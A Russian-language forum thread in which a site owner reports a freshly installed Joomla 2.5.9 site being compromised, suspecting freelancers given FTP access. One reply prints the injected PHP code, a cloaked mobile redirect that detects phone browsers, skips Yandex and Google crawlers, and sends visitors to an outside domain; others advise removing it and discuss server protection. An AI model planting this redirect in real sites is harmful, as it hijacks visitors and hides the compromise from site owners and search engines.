Вломали сайт?

Зачем?

Начинайте чистить сайт, почитайте прилепленный топик. ИТД.

не надо даже переворачивать. В пустой ПХП файл вставьте этот код и увидите результат в исходном коде страницы, когда откройте в браузере.

Это мобильный редирект, можешь удалять)

if ((preg_match('/text\/vnd.wap.wml|application\/vnd.wap.xhtml\+xml/si', @$_SERVER['HTTP_ACCEPT']) || preg_match('/alcatel|amoi|android|avantgo|blackberry|benq|cell|cricket|docomo|elaine|htc|iemobile|iphone|ipad|ipaq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola|nec-|nokia|palm|panasonic|philips|phone|sagem|sharp|sie-|smartphone|sony|symbian|t-mobile|telus|up\.browser|up\.link|vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || preg_match('/msearch|m\?q=/si', @$_SERVER['HTTP_REFERER'])) && !preg_match('/macintosh|america|avant|download|windows\-media\-player|yandex|google/si', @$_SERVER['HTTP_USER_AGENT'])) { echo '<script>window.location="http://mobile-mobi.info/?2"</script>'; flush(); exit; }

Точно...

Давал ftp нескольким фрилансерам, а так чтобы ломанули маленькая вероятность, свежий сайт, только установленная joomla 2.5.9, трафик = 0

Возможно изначально эта зараза была в движке, может не только она.

В инсталяхе joomla с joomlacode.org ??

У одного из них либо нет Касперского, либо совести. )

Вот это скорее всего 🙅

zaxavar, ага. Я после таких же фрилансеров 40 сайтов чистил. Под конец глаза были в пучок, реально. :)

Так а как же быть?

Я понимаю, что допустим не всегда вина фрилансера может быть, где-то в системе у него сидит дрянь. Как сервак обезопасить? Ставить онлайн мониторинг что-ли?